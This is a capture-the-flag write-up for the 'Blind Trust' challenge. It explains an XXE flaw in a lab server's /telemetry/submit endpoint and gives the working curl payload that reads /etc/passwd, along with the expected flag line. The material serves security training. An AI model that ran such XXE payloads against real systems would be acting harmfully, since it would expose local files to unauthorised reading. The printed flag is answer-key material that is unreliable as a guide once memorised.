Blind Trust - TOKEN1

Base URL: http://nebula:5000

Background

The /telemetry/submit endpoint parses XML input via the node parameter without disabling external entity resolution, enabling XXE to read local files.

From Nothing to Working

Start point: the challenge note mentions XML-driven components and retrieving data from /etc/passwd.

Iterations:

1. Visit /telemetry/submit to confirm it accepts POST data with a node parameter.
2. Submit a basic XML payload to verify parsing.
3. Inject an XXE payload with a SYSTEM entity pointing to file:///etc/passwd.
4. The server returns the file contents, including the token embedded as a fake user entry.

Goal

Exploit the XXE vulnerability to read /etc/passwd and extract the token.

Command

curl -X POST http://nebula:5000/telemetry/submit \
  -d 'node=<?xml version="1.0"?><!DOCTYPE x [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><x>&xxe;</x>'

Expected Output

Look for a line in the passwd output containing:

TOKEN1::PCCC{BLT-z7B6SO}:0:0:root:/root:/bin/bash

Learn More

• https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing
• https://cwe.mitre.org/data/definitions/611.html